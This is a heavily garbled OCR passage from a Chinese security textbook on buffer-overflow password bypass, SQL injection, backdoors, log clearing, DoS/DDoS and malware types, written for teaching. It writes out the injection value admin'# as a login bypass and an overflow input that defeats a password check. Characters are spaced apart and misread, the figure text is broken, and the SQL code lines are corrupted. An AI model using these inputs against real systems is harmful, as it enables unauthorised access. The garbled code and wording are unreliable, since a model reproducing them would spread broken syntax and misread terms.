当 verify_password() 被 调用 时 ,系统 会 给 它 分 配 一 片 连续 的 内 存 空间 ,这 两 个 变量 就 分 布 
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在 那里 (实际 上 就 叫 函 数 栈 帧 ), 如 图 9-9 所 示 。 


nD 人 

char buffer[0 一 3 

j 户 输入 的 字符 串 将 拷贝 进 buffer[8]。 | ey 
一 char buffer[4 一 7 

authenticated 变量 实际 上 是 一 个 标志 变量 , 当 其 值 bar bufferf4~7] EE 

为 非 0 时 ,程序 进入 错误 重 输 的 流程 , 值 网 0 Gi ; 进 Int authenticated(0x00000001) 

人 全 的 下 而 的 放大 图 9-9 变量 在 内 存 中 的 位 置 


字符 串 数据 最 后 都 有 作为 结束 标志 的 NULL 
(0) , 当 我 们 输入 的 字符 超过 7 个 ,那么 超出 的 部 分 将 破坏 掉 与 它 紧 邻 着 的 authenticated 变 
量 的 内 容 。 例 如 我 们 输入 包含 8 个 字符 的 错误 密码 qqqqqqqq, 那 么 buffer[8] 所 拥有 的 8 个 
人 q 的 ASCII 码 0x71 填 满 , 而 字符 串 的 结束 标志 NULL 刚 写 入 了 
authenticated 变量 并 且 值 为 0x00000000。 

函数 返回 ,main 函数 看 到 authenticated 是 0 ,就 会 认为 密码 正确 。 这 样 ,我 们 就 用 错误 
的 密码 得 到 了 正确 密码 的 运行 效果 ,如 图 9-10 所 示 。 


Et Turbo C++ IDE 


please input password: 1234567 
Congratulation! You have passed the verification? 
lease input password: 01234567 

incorrect passvord! 


Iplease input password: 


Bongratudetion? you have pasdod thorieication? 用 qqqqqqqq 成 功 
J 


图 9-10 利用 缓冲 区 溢出 通过 口令 认证 


当 输入 qdqqqqqqq 时 ,程序 流程 改变 ,认证 成 功 。 如 果 输 入 几 十 个 字符 的 长 串 , 程 序 会 
衣 溃 。 

注意 为 什么 输入 01234567 不 行 ? 因为 字符 串 大 小 的 比较 是 按 字典 序 来 的 ,所 以 这 个 串 
小 于 1234567 ,authenticated 的 值 是 一 1, 在 内 存 里 将 按照 补 码 存 负数 ,所 以 实际 存 的 不 是 
0x01000000 而 是 0xffffffff。 那 么 字符 串 截 断后 符 0x00 淹没 后 , 变 成 0x00ffffff, 还 是 非 0， 
所 以 没有 进入 正确 分 支 。 

这 种 缺陷 大 多 数 情况 下 会 导致 崩溃 ,但 是 结合 内 存 中 的 具体 情况 ,如 果 精 心 构造 缓冲 区 
的 话 , 是 有 可 能 让 程序 做 出 设计 人 员 意 想不到 的 事情 。 

本 例 只 是 用 一 个 字 节 淹没 了 邻接 变量 ,导致 了 程序 进入 密码 正确 的 处 理 流程 ,使 设计 的 
验证 功能 失效 。 

实际 上 攻击 者 利用 的 缓冲 区 溢出 还 要 复杂 得 多 ,还 要 牵涉 到 Shellcode 的 设计 和 编写 。 

当然 ,网 络 上 也 有 很 多 现成 的 工具 ,利用 一 些 特定 的 漏洞 来 进行 溢出 攻击 。 
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932 SQL 注入 攻击 


很 多 网 络 应 用 都 采用 了 B/S 模式 , 即 用 户 可 以 通过 浏览 器 来 获取 某 些 服务 。SQL 命令 
注入 的 漏洞 是 Web 系统 特有 的 一 类 漏洞 , 源 于 PHP、ASP 等 脚本 语言 对 用 户 输 入 数据 解析 
的 缺陷 ,将 解析 错误 的 语句 发 送 给 了 MySQL 数据 库 。 

如 果 用 户 的 输入 能 够 影响 到 脚本 中 SQL 命令 串 的 生成 ,那么 很 可 能 在 添加 了 单 引 号 、 
“# "号 等 转 义 命令 字符 后 ,能够 改变 数据 库 最 终 执行 的 SQL 命令 ,攻击 者 就 利用 这 个 特点 
修改 自己 的 输入 ,最 终 获 取 数 据 库 中 自己 所 需要 的 信息 ,例如 管理 员 密 码 。 这 就 是 SQL 
法 大 

以 PHP 语言 为 例 , 如 果 程 序 员 在 编程 时 没有 对 待 用 户 输 入 的 变量 $u 和 $p 进行 合理 
的 限制 ,那么 当 攻 击 者 把 用 户 名 输入 为 admin' 间 的 时 候 , 输 入 字符 串 中 的 单 引 号 将 和 脚本 
中 的 变量 的 单 引号 形成 配对 ,而 输入 字符 串 中 的 # 号 对 于 mysql 的 语言 解释 起 来 说 是 行 注 
释 符 , 因 此 后 面 的 语句 被 作为 注释 处 理 。 


mysql_db query('db'," select x from name where user = '$ u'and psw = '$ p'); 
mysql_db_query('db',"select * from name where user = 'admin'# 'and psw = '123') 


"#" 后 的 命令 将 被 当成 注释 ,最 终 执行 的 命令 为 


select * from tabel name where user = 'admin' 


通过 这 样 的 输入 ,攻击 者 就 绕 过 了 身份 验证 机 制 ,没有 正确 的 密码 也 可 以 看 到 管理 员 的 
信息 。 

SQL 注入 攻击 的 精髓 在 于 构造 巧妙 的 注入 命令 串 , 从 服务 器 不 同 的 反馈 结果 中 ,逐步 
分 析出 数据 库 中 各 个 表 项 之 间 的 关系 ,直到 彻底 攻破 数据 库 。 遇 到 功能 强大 的 数据 库 , 例 如 
Microsoft SQL Server, 如 果 数 据 库 权限 配置 不 合理 ,利用 存储 过 程 有 时 候 甚至 能 够 做 到 远 
程控 制服 务 器 。 

缓冲 区 溢出 需要 掌握 大 量 底层 知识 ,而 SQL 注入 攻击 的 技术 门槛 较 低 ,只 要 懂得 基本 
的 Web 技术 和 数据 库 知识 就 可 以 实施 攻击 。 另 外 ,一 些 自动 化 的 攻击 ,例如 NBSI2 等 ,也 
使 这 类 攻击 变 得 容易 。 目 前 ,这 类 技术 已 经 发 展 成 为 一 套 比较 完善 的 体系 ,成 为 破坏 网 站 的 
主流 技术 。 

SQL 注入 是 从 正常 的 WWW 端口 访问 ,而 且 表 面 看 起 来 跟 一 般 的 Web 页 面 访问 没 什 
区 别 , 所 以 防火 墙 不 会 对 SQL 注入 发 出 警报 ,如 果 管 理 员 没 查看 日 志 的 习惯 ,可 能 被 入 侵 
很 长 时 间 都 不 会 发 觉 。 

针对 SQL 注入 攻击 的 防范 ,当务之急 是 对 程序 员 进 行 安全 培训 。 开 发 Web 应 用 时 要 
对 用 户 输入 的 数据 进行 限制 ,过 滤 掉 可 能 引起 攻击 的 敏感 字符 。 另 外 ,数据 库 对 大 小 写 不 敏 
感 ,所 以 要 使 用 正则 表达 式 , 同 时 过 滤 掉 select、SELECT、sEleCt 等 所 有 形式 的 保留 字 。 

此 外 ,有 一 些 自动 化 的 扫描 工具 可 以 帮助 检测 网 站 中 的 SQL 注入 漏洞 ,例如 NGS 公司 
生产 的 NGSSQuirreL 就 是 这 样 一 款 工 具 。 
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94 保持 访问 权限 


在 一 次 入侵 结束 后 ,入 侵 者 有 可 能 希望 以 后 能 够 方便 地 再 次 进入 。 所 以 会 在 系统 里 面 
留 下 一 些 后 门 ,例如 开放 一 些 具有 管理 员 权 限 的 新 账号 、 安 装 后 门 和 RootKit 等 。 

开放 新 账号 比较 简单 ,入 侵 者 一 般 会 选取 一 些 看 起 来 很 正常 的 账号 作为 自己 的 账号 , 例 
如 Ftp、game、mail、news 等 。 粗 心 的 管理 员 有 了 时候 会 误 以 为 是 已 经 开放 过 的 正常 账号 。 但 
这 个 方法 对 于 经 验 丰 富 的 管理 员 并 不 太 有 效 ,他 们 甚至 会 偷偷 监视 这 些 账 号 ,从 中 找 出 入 侵 
者 的 线索 。 

在 已 经 被 人 侵 的 机 器 里 面 安装 后 门 也 是 常用 的 方法 。 后 门 具 有 隐蔽 性 和 非 授权 性 的 特 
点 。 所 谓 隐蔽 性 是 指 后 门 的 设计 者 为 了 防止 被 发 现 ,会 采用 多 种 手段 隐藏 ,这 样 服务 器 端 即 
使 发 现 有 后 门 , 也 不 能 确定 其 具体 位 置 。 所 谓 非 授权 性 是 指 入 侵 者 放 入 的 后 门 往往 是 能 够 
实现 远程 控制 的 后 门 ,一 旦 控制 端 与 服务 器 端 连接 后 ,控制 端 将 享有 服务 器 端的 大 部 分 操作 
权限 ,包括 修改 文件 ,修改 注册 表 ,控制 鼠标 、 键 盘 , 甚 至 是 远程 控制 对 方 计算 机 。 而 这 些 权 
力 并 不 是 服务 器 端 赋予 的 ,而 是 通过 后 门 获取 的 。 

另外 入 侵 者 还 可 能 放 和 人 RootKit。 它 主要 通过 替换 系统 文件 来 达到 目的 。 这 样 就 会 更 
加 的 隐蔽 ,使 检测 变 得 比较 困难 。 


95 消除 入 侵 痕 迹 


在 所 有 的 操作 系统 中 ,包括 Windows 和 UNIX 系统 ,都 有 自己 的 日 志 系统 。 在 日 志 中 
记载 了 各 种 信息 ,例如 用 户 对 其 的 操作 应 用 程序 所 作 的 行为 .各 种 各 样 的 安全 事件 等 。 当 
入 侵 者 非法 进入 了 系统 后 ,往往 会 被 这 些 日 志 记录 下 来 。 而 管理 员 通 过 日 志 , 则 有 可 能 分 析 
出 入 侵 者 的 行为 ,甚至 是 根据 线索 找到 入 侵 者 。 

所 以 ,一 个 相对 专业 的 入侵 者 ,会 在 人 侵 行为 完成 后 ,消除 自己 的 痕迹 ,就 像 专业 的 小 偷 
离开 现场 时 ,会 小 心地 把 指纹 擦 掉 。 

以 Windows 的 日 志 系统 为 例 。 它 自 带 了 一 个 “事件 查看 器 ”, 可 以 通过 “开始 一 控制 面 
板 一 管理 工具 一 事件 查看 器 "将 其 打开 。 事 件 查看 器 的 界面 如 图 9-11 所 示 。 


事件 查看 器 (本 地 ) 
名 称 [zx 外 | 


加 可 用 程序 应 用 程序 错误 记录 。 512.0kB 
加 安全 性 安全 审核 记录 64.0KB 
加 系统 系统 槽 涡 记录 S12.0KB 


9-11 事件 查看 器 界面 
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1. 应 用 程序 日 志 


包含 由 应 用 程序 或 系统 程序 记录 的 事件 ,主要 记录 程序 运行 方面 的 事件 ,例如 数据 库 程 
序 可 以 在 应 用 程序 日 志 中 记录 文件 错误 ,程序 开发 人 员 可 以 自行 决定 监视 哪些 事件 。 如 果 
某 个 应 用 程序 出 现 崩 溃 情 况 ,那么 我 们 可 以 从 程序 事件 日 志 中 找到 相应 的 记录 ,也许 会 有 助 
于 解决 问题 。 


2. 安全 性 日 志 


记录 了 诸如 有 效 和 无 效 的 登录 尝试 等 事件 ,以 及 与 资源 使 用 相关 的 事件 ,例如 创建 、 打 
开 或 删除 文件 或 其 他 对 象 , 系 统管 理 员 可 以 指定 在 安全 性 日 志 中 记录 什么 事件 。 默 认 设 置 
下 ,安全 性 日 志 是 关闭 的 ,管理 员 可 以 使 用 组 策略 来 启动 安全 性 日 志 , 或 者 在 注册 表 中 设置 
审核 策略 ,以 便当 安全 性 日 志 满 后 使 系统 停止 响应 。 


3. 系统 日 志 


包含 Windows XP 的 系统 组 件 记 录 的 事件 ,例如 在 启动 过 程 中 加 载 驱动 程序 或 其 他 系 
统 组 件 失败 将 记录 在 系统 日 志 中 ,默认 情况 下 Windows 会 将 系统 事件 记录 到 系统 日 志 
之 中 。 

如 果 机 器 被 配置 为 域 控制 器 ,那么 还 将 包括 目录 服务 日 志 、 文 件 复制 服务 日 志 ; 如 果 机 
器 被 配置 为 域名 系统 (DNS) 服 务 器 ,那么 还 将 记录 DNS 服务 器 日 志 。 当 启动 Windows 时 ， 
“事件 日 志 ” 服 务 (EventLog) 会 自动 启动 ,所 有 用 户 都 可 以 查看 应 用 程序 和 系统 日 志 , 但 只 
有 管理 员 才 能 访问 安全 性 日 志 。 

这 些 日 志文 件 都 被 存放 在 管理 员 用 户 的 system32 目录 下 ,下 面 列 出 了 一 些 例子 : 

DNS 日 志 默 认 位 置 : %systemroot%\system32\config, 默 认 文 件 大 小 512 KB, 管 理 员 
都 会 改变 这 个 默认 大 小 。 

安全 日 志文 件 : %systemroot%\system32\config\SecEvent. EVT。 

系统 日 志文 件 : %systemroot%\system32\config\SysEvent. EVT。 

应 用 程序 日 志文 件 : systemroot%\system32\config\AppEvent. EVT。 

FTP 日 志 默 认 位 置 ; % systemroot%\system32\logfiles\msftpsvcl\, 上 默认 每 天 一 个 


WWW 日 志 默 认 位 置 % systemroot% N\system32\logfiles\w3svcl\, 默 认 每 天 一 个 
日 志 。 

UNIX 的 日 志 系 统 比 Windows 更 为 强大 。 

日 志文 件 通常 有 某 项 服务 在 后 台 保护 ,除了 系统 日 志 、 安 全 日 志 、 应 用 程序 日 志 等 ,它们 
的 服务 是 Windows 的 关键 进程 ,而 且 与 注册 表 文 件 在 一 块 , 当 Windows 启动 后 ,服务 则 马 
上 被 启动 用 来 保护 这 些 文件 ,所 以 很 难 删 除 。 

虽然 可 以 通过 事件 查看 器 把 日 志清 空 ,但 这 种 行为 本 身 就 是 一 个 不 正常 事件 ,会 让 系统 
管理 员 产 生 怀疑 。 所 以 人 侵 者 一 般 只 是 删 掉 和 自己 和 人 侵 内 容 相 关 的 事件 ,这 往往 需要 日 志 
删除 工具 来 配合 。 这 样 的 工具 目前 非常 普遍 。 
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96 拒绝 服务 攻击 
1. 基本 概念 


拒绝 服务 攻击 (Denial of Service, DoS) 是 指 攻击 者 利用 系统 的 缺陷 ,通过 执行 一 些 恶意 
的 操作 而 使 合法 的 系统 用 户 不 能 及 时 地 得 到 服务 或 者 系统 资源 ,如 CPU 处 理 时 间 、 存 储 
器 、 网 络 带宽 Web 服务 等 。 

这 种 攻击 方式 和 前 面 讲 的 几 种 方式 都 不 一 样 : 它 本 身 并 不 能 使 攻击 者 获取 什么 资源 ， 
例如 系统 的 控制 权力 、 秘 密 的 文件 等 , 它 只 是 以 破坏 服务 为 目的 , 仅 针 对 暴露 于 网 络 上 的 服 
务 器 或 客户 端的 软 、 硬 件 服 务 进行 干扰 ,迫使 目标 服务 暂时 人 性 的 失效 ,具有 很 强 的 破坏 性 。 
往往 把 这 种 方式 称 为 “攻击 ?而 不 是 “入 侵 ”。 

拒绝 服务 攻击 往往 造成 计算 机 或 网 络 无 法 正常 工作 ,进而 会 使 一 个 依赖 于 计算 机 或 者 
网 络 服务 的 企业 不 能 正常 运转 。 例 如 各 种 网 站 服务 器 ,一 旦 受到 拒绝 服务 攻击 ,那么 这 个 网 
站 就 无 法 登录 了 ,在 2000 年 发 生 的 所 谓 * 中 美 黑 客 大 战 ?" 中 ,许多 政府 .商业 网 站 都 受到 过 拒 
绝 服务 攻击 ,使 得 无 法 提供 正常 服务 ,从 而 造成 一 定 的 损失 。 另 外 ,拒绝 服务 攻击 也 是 令 提 
供 网 络 游戏 服务 的 供应 商 很 头疼 的 一 种 攻击 方式 。 下 面 是 一 些 常见 的 拒绝 服务 攻击 方法 。 

1) 基于 网 络 带宽 消耗 的 拒绝 服务 攻击 

攻击 者 有 意 制造 大 量 的 数据 包 或 传输 大 量 文件 以 占用 有 限 的 带宽 资源 ,使 合法 用 户 无 
法 正常 使 用 网 络 资源 ,从 而 实现 攻击 者 的 意图 。 例 如 SYN Flood( 同 步 风 暴 ) 就 是 利用 了 
TCP/IP 协议 的 漏洞 ,攻击 者 假 造 源 IP 地 址 发 送 多 个 同步 数据 包 (SYN Packet) 给 服务 器 ， 
服务 器 因 无 法 收 到 确认 数据 包 而 需要 处 理 大 量 的 半 连 接 状 态 ,让 主机 无 法 处 理 正 常 的 连接 
需求 ,影响 正常 运作 。 

2) 消耗 磁盘 空间 的 拒绝 服务 攻击 

这 种 拒绝 服务 攻击 利用 系统 的 缺陷 ,制造 大 量 的 垃圾 信息 。 典 型 的 攻击 方法 有 垃圾 邮 
件 、 故 意 制造 大 量 日 志 信 息 。 

3) 消耗 CPU 资源 和 内 存 的 拒绝 服务 攻击 

操作 系统 需要 提供 CPU 和 内 存 资源 给 许多 进程 共用 ,攻击 者 利用 系统 存在 的 缺陷 ,有 
意 使 用 大 量 的 CPU 和 内 存 资源 ,从 而 导致 系统 服务 性 能 下 降 甚至 造成 系统 崩溃 。 典 型 的 
攻击 方法 就 是 使 用 蠕虫 程序 。 

4) 基于 系统 缺陷 的 拒绝 服务 攻击 

攻击 者 利用 目标 系统 的 漏洞 和 通信 协议 的 弱点 来 实现 拒绝 服务 攻击 。 下 面 是 两 种 很 典 
型 的 攻击 方式 。 

Ping of Death: 根据 TCP/IP 的 规范 ,一 个 包 的 长 度 最 大 为 65 536 字 节 。 尽 管 一 个 包 
的 长 度 不 能 超过 65 536 字 节 ,但 是 一 个 包 分 成 的 多 个 片段 的 至 加 却 能 做 到 。 当 一 个 主机 收 
到 了 长 度 大 于 65 536 字 节 的 包 时 ,就 是 受到 了 Ping of Death 攻击 ,该 攻击 会 造成 主机 的 瘫痪 。 

Teardrop: IP 数据 包 在 网 络 传递 时 ,数据 包 可 以 分 成 更 小 的 片段 。 攻 击 者 可 以 通过 发 
送 两 段 (或 者 更 多 ) 数 据 包 来 实现 Teardrop 攻击 。 第 一 个 包 的 偏 移 量 为 0, 长 度 为 N, 第 二 
个 包 的 偏 移 量 小 于 N。 为 了 合并 这 些 数据 段 .TCP/IP 堆栈 会 分 配 超 乎 寻常 的 巨大 资源 ,从 
而 造成 系统 资源 的 缺乏 甚至 机 器 的 重新 启动 。 
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2. 分 布 式 拒绝 服务 攻击 


分 布 式 拒绝 服务 (Distributed Denial of Service, DDoS) 攻 击 指 借助 于 客户 /服务 器 技 
术 , 将 多 个 计算 机 联合 起 来 作为 攻击 平台 ,对 一 个 或 多 个 目标 发 动 DoS 攻击 ,从 而 成 倍 地 提 
高 拒绝 服务 攻击 的 威力 。 

DDoS 攻击 手段 是 在 传统 的 DoS 攻击 基础 之 上 产生 的 一 类 攻击 方式 。 单 一 的 DoS 攻 
击 一 般 是 采用 一 对 一 方式 的 , 当 攻 击 目标 CPU 速度 低 、 内 存 小 或 者 网 络 带宽 小 等 各 项 性 能 
指标 不 高 时 的 效果 是 明显 的 。 随 着 计算 机 与 网 络 技术 的 发 展 , 计 算 机 的 处 理 能 力 迅 速 增长 ， 
内 存 大 大 增加 ,同时 也 出 现 了 千 兆 级 别 的 网 络 ,这 使 得 DoS 攻击 的 困难 程度 加 大 了 ,目标 对 
恶意 攻击 包 的 “消化 能 力 ” 加 强 了 不 少 , 例 如 攻击 软件 每 秒 钟 可 以 发 送 3000 个 攻击 包 , 但 目 
标 主机 与 网 络 带 宽 每 秒 钟 可 以 处 理 10 000 个 攻击 包 , 这 样 一 来 攻击 就 不 会 产生 什么 效果 。 

这 时 候 分 布 式 的 拒绝 服务 攻击 手段 就 应 运 而 生 了 。 如 果 说 计算 机 与 网 络 的 处 理 能 力 加 
大 了 10 倍 ,用 一 台 攻 击 机 来 攻击 不 再 能 起 作用 的 话 , 现 在 攻击 者 使 用 10 台 、100 台 攻 击 机 
同时 攻击 。 DDoS 就 是 利用 更 多 的 便 从 机 来 发 起 进攻 ,以 比 从 前 更 大 的 规模 来 进攻 受害 者 。 

通常 ,攻击 者 使 用 一 个 偷窃 账号 将 DDoS 主 控 程 序 安 装 在 一 个 计算 机 上 ,在 一 个 设 定 的 
时 间 主 控 程 序 将 与 大 量 代理 程序 通信 ,代理 程序 已 经 被 安装 在 Internet 上 的 许多 计算 机 上 。 
代理 程序 收 到 指令 时 就 发 动 攻击 。 利 用 客户 /服务 器 技术 , 主 控 程序 能 在 几 秒 钟 内 激活 成 百 
上 千 次 代理 程序 的 运行 ,这 些 安 装 了 代理 程序 的 机 器 被 称 为 俐 介 机 。 分 布 式 拒绝 服务 攻击 
体系 如 图 9-12 所 示 。 


控制 便 介 机 控制 便 偶 机 


攻 及 击 六 击 攻 再 


/ 
Ca 


图 9-12 分 布 式 拒绝 服务 攻击 体系 结构 


页 击 


高 速 广泛 连接 的 网 络 给 大 家 带 来 了 方便 ,也 为 DDoS 攻击 创造 了 极为 有 利 的 条 件 。 在 
低速 网 络 时 代 时 ,黑客 占领 攻击 用 的 佛 偶 机 时 ,总 是 会 优先 考虑 离 目标 网 络 距离 近 的 机 器 ， 
因为 经 过 路 由 器 的 跳 数 少 ,效果 好 。 而 现在 电信 和 骨干 结 点 之 间 的 连接 都 是 以 GB 为 级 别 的 ， 
大 城市 之 间 更 可 以 达到 2. 5GB 或 者 更 高 的 连接 ,这 使 得 攻击 可 以 从 更 远 的 地 方 或 者 其 他 城 
市 发 起 ,攻击 者 的 佛 儒 机 位 置 可 以 分 布 在 更 大 的 范围 ,选择 起 来 更 灵活 了 。 


3. 拒绝 服务 攻击 的 防范 
为 了 防范 拒绝 服务 攻击 ,可 以 采取 下 列 措施 : 
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(1) 确保 所 有 服务 器 采用 最 新 系统 ,并 打上 安全 补丁 。 从 已 有 的 拒绝 服务 攻击 事件 分 
析 来 看 ,几乎 每 个 曾 受 到 DDoS 攻击 的 系统 都 没有 及 时 打上 补丁 。 

(2) 确保 管理 员 对 所 有 主机 进行 检查 ,而 不 仅 针对 关键 主机 。 这 是 为 了 确保 管理 员 知 
道 每 个 主机 系统 在 运行 什么 , 谁 在 使 用 主机 ,哪些 人 可 以 访问 主机 。 否 则 ,即使 黑客 侵犯 了 
系统 ,也 很 难 查 明 。 

(3) 确保 从 服务 器 相应 的 目录 或 文件 数据 库 中 删除 未 使 用 的 服务 如 FTP 或 NFS, 守 护 
程序 是 否 存 在 一 些 已 知 的 漏洞 ,黑客 通过 根 攻击 就 能 获得 访问 特权 系统 的 权限 ,并 能 访问 其 
他 系统 甚至 是 受 防火 墙 保护 的 系统 。 

(4) 确保 运行 在 UNIX 上 的 所 有 服务 都 有 TCP 封装 程序 ,限制 对 主机 的 访问 权限 。 

(5) 禁止 使 用 网 络 访问 程序 如 Telnet、Ftp、Rsh、Rlogin 和 Rep, 以 更 加 安全 的 协议 如 
SSH 取代 。SSH 不 会 在 网 上 以 明文 格式 传送 口令 ,而 Telnet 和 Rlogin 则 正好 相反 ,黑客 能 
搜寻 到 这 些 口 令 , 从 而 立即 访问 网 络 上 的 重要 服务 器 。 

(6) 限制 在 防火 墙 外 与 网 络 文件 共享 。 共 享 会 使 黑客 有 机 会 截获 系统 文件 ,并 以 恶意 
代码 替换 它 ,文件 传输 功能 将 陷 人 瘫痪 。 

(7) 在 防火 墙 上 运行 端口 映射 程序 或 端口 扫描 程序 。 大 多 数 事件 是 由 于 防火 墙 配置 不 
当 造 成 的 ,使 DoS/DDoS 攻击 成 功率 很 高 ,所 以 一 定 要 认真 检查 特权 端口 和 非特 权 端口 。 

(8) 检查 所 有 网 络 设备 和 主机 /服务 器 系统 的 日 志 。 只 要 日 志 出 现 漏洞 或 时 间 出 现 变 
更 ,几乎 可 以 肯定 ,相关 的 主机 安全 受到 了 威胁 。 

从 实际 情况 来 看 ,目前 的 技术 对 分 布 式 拒绝 服务 攻击 的 防范 效果 并 不 太 理 想 , 但 如 果 采 
取 上 述 几 项 措施 ,能 起 到 一 定 的 预防 作用 。 
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恶意 代码 (Malicious Code) 或 者 叫 恶意 软件 (Malicious Software) 是 一 种 程序 , 它 把 代 
码 在 不 被 察觉 的 情况 下 镶嵌 到 另 一 段 程序 中 ,从 而 达到 破坏 被 感染 计算 机 数据 .运行 具有 人 
侵 性 或 破坏 性 的 程序 、 破 坏 被 感染 计算 机 数据 安全 性 和 完整 性 的 目的 。 

恶意 代码 具有 如 下 共同 特征 : 

(1) 恶意 的 目的 。 

(2) 本 身 是 程序 。 

(3) 通过 执行 发 生 作用 。 

恶意 代码 一 般 分 成 几 类 : 病毒 .蠕虫 恶意 移动 代码 ,特洛伊 木马 以 及 RootKit。 表 10-1 
列 出 了 常见 的 恶意 代码 类 型 及 其 特征 。 


表 10-1 恶意 代码 类 型 


恶意 代码 类 型 定义 特征 典型 实例 


计算 机 病毒 (Virus) 感染 宿主 文件 ,例如 可 执行 文件 和 文档 等 , 自 ”CIH 和 梅里 莎 病毒 
动 复制 。 经 常 需要 人 们 交互 感染 复制 


蠕虫 (Worm) 通过 网 络 传播 , 自动 复制 ,通常 无 需 人 们 交互 ”Nimda、 莫 里 斯 蠕虫 .冲击 波 
感染 传播 
恶意 移动 代码 移动 代码 是 能 够 从 主机 传输 到 客户 端 计算 机 Cross Site Scripting 


上 并 执行 的 代码 , 它 通常 是 作为 病毒 ,蠕虫 ,或 
是 特洛伊 木马 的 一 部 分 被 传送 到 客户 计算 机 
上 的 。 另 外 ,移动 代码 可 以 利用 系统 的 漏洞 进 
行人 侵 ,例如 非法 的 数据 访问 和 盗 取 root 账 
号 。 通 常用 于 编写 移动 代码 的 工具 包括 Java 
Applets\ActiveX ,JavaScript 和 VBScript 


特洛伊 木马 将 自己 伪装 成 有 用 的 程序 掩饰 恶意 目的 Hydan 冰河 

(Trojan Horse) 

RootKit 替换 或 修改 系统 管理 员 和 用 户 使 用 的 可 执行 ”Linux RootKit(LRK) 系 列 
程序 。 甚 至 控制 操作 系统 的 内 核 

组 合 恶意 代码 组 合 上 述 不 同 技术 以 增强 破坏 力 Lion, Bugbear. B 


人 们 往往 混淆 这 些 恶 意 代码 的 类 型 ,例如 把 特洛伊 木马 当做 蠕虫 ,或 者 把 RootKit 当做 
病毒 。 如 果 不 理解 各 种 恶意 代码 类 型 的 区 别 , 则 不 明白 如 何 有 效 地 实施 防御 。 
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10.1 病 毒 


计算 机 病毒 (Computer Virus) 在 (中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 》 中 被 
明确 定义 ,病毒 指 编制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 破坏 数据 ,影响 计 
算 机 使 用 并 且 能 够 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 ”。 

病毒 的 主要 特点 之 一 就 是 它 不 能 作为 独立 的 可 执行 程序 运行 。 病 毒 的 携带 者 被 称 为 宿 
主 (host) ,可 以 是 一 个 标准 的 可 执行 程序 ,如 Notepad. exe, 也 可 以 是 包含 宏 命 令 的 数据 文 
件 ,例如 Microsoft 的 Word 文档 。 病 毒 同样 能 附着 在 保存 在 磁盘 引导 区 的 底层 指令 中 。 

自我 复制 是 病毒 的 另 一 个 核心 特征 。 这 个 特征 说 明 它 具有 自动 产生 和 自身 复制 的 能 
力 , 而 不 需要 操作 者 手动 复制 其 代码 。 这 种 能 力 允 许 病毒 在 文件 之 间 、 目 录 之 间 、 磁 盘 之 间 ， 
甚至 系统 之 间 进 行 传播 。 尽 管 坐 在 计算 机 前 的 人 没有 执行 任何 复制 操作 ,在 病毒 发 作 和 复 
制 前 ,用 户 经 常 要 通过 执行 宿主 程序 来 激活 病毒 。 

另外 一 个 重要 的 概念 是 ,病毒 感染 是 一 种 跨 平台 的 现象 。 也 就 是 说 ,病毒 并 非 只 以 
Windows 操作 系统 为 感染 目标 。 实 际 上 ,Linux、Solaris 以 及 其 他 类 UNIX 操作 系统 也 会 遭 
到 病毒 的 攻击 。 


10.1.1 感染 


和 生物 病毒 一 样 ,计算 机 病毒 具有 极 强 的 针对 性 ,病毒 的 种 类 不 同 ,其 感染 的 对 象 也 不 
尽 相 同 。 


1. 感染 可 执行 文件 


病毒 通常 将 自身 附着 在 可 执行 文件 上 , 当 有 人 运行 受 感染 程序 时 ,病毒 就 能 够 让 自己 激 
活 。 大 多 数 操作 系统 拥有 不 同 的 可 执行 文件 类 型 .UNIX 系统 包括 二 进 制 文件 和 多 种 脚本 
文件 类 型 ,它们 都 可 能 被 病毒 感染 。 

Windows 系统 支持 两 种 基本 可 执行 文件 类 型 ,. COM 文件 和 . EXE 文件 ,都 属于 潜在 
的 宿主 。 如 今 的 Windows 版 本 实际 上 可 以 执行 几 种 类 型 的 . EXE 文件 ,本 地 运行 的 . EXE 
文件 为 PE(Portable Executable) 格 式 ,事实 上 ,并 不 是 所 有 的 PE 文件 的 扩展 名 都 为 . EXE， 
扩展 名 为 . SYS、. DLL、. OCX、. CPL、. SCR 的 文件 同样 符合 PE 格式 。 

除了 以 独立 的 可 执行 文件 为 目标 外 ,病毒 还 可 以 试图 将 自身 嵌入 到 操作 系统 的 内 核 中 。 
在 1999 年 前 后 发 现 的 Infis 病毒 ,将 自己 作为 一 个 内 核 模式 的 驱动 程序 安装 到 Windows 
NT 和 Windows 2000 上 。 


2. 感染 引导 区 


当 打开 计算 机 时 , 它 首 先 会 执行 对 硬盘 进行 初始 化 并 允许 系统 启动 的 一 系列 指令 。 实 
现 这 种 动作 的 代码 是 BIOS 程序 部 分 ,由 它 来 确定 第 一 个 硬盘 的 第 一 个 扇 区 ,并 执行 存放 在 
其 中 并 被 称 为 主 引 导 记 录 (Master Boot Record, MBR) 的 小 程序 。 人 们 将 存储 MBR 的 数据 
的 物理 扇 区 称 为 “ 主 引导 区 ”。 
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MBR 的 部 分 代码 知道 如 何 列举 所 有 可 能 的 分 区 ,如何 将 控制 权 转 移 到 所 需 分 区 的 引导 
区 。 位 于 每 个 分 区 开端 的 引导 区 被 称 为 “分 区 引导 区 ”(Partition Boot Sector,PBS) ,嵌入 在 
PBS 中 的 程序 可 以 定位 操作 系统 的 启动 文件 ,并 在 启动 过 程 中 将 控制 权 传 给 启动 文件 。 

某 些 病毒 会 利用 MBR 和 PBS 内容 的 可 执行 特性 ,将 自身 附着 在 某 一 个 引导 区 中 ,感染 
了 引导 区 病毒 的 计算 机 在 启动 时 能 执行 病毒 代码 。 

例如 1991 年 发 现 的 “ 米 开朗 基 罗 ”病毒 就 是 一 种 典型 的 引导 区 病毒 ,也 是 目前 最 有 名 的 
病毒 之 一 。 受 感染 的 计算 机 在 3 月 6 日 ( 米 开 朗 基 罗 的 生日 ) 启 动 ,病毒 就 会 覆盖 硬盘 所 有 
的 扇 区 ,然后 格式 化 硬盘 。 


3. 感染 文档 文件 


目前 ,许多 流行 的 文档 格式 支持 内 嵌 代 码 , 当 用 户 打 开 文 档 时 ,这 些 代码 可 由 应 用 程序 
执行 。 内 嵌 的 代码 一 般 被 称 为 “ 宏 ”(Macro) 。 

例如 Microsoft 的 Office 系列 产品 .AutoCAD 也 支持 VBA 写 的 宏 。 

以 Word 文档 为 例 ,假如 一 个 文档 包含 一 个 叫做 Document Open() 的 子 函数 , 则 当 用 户 
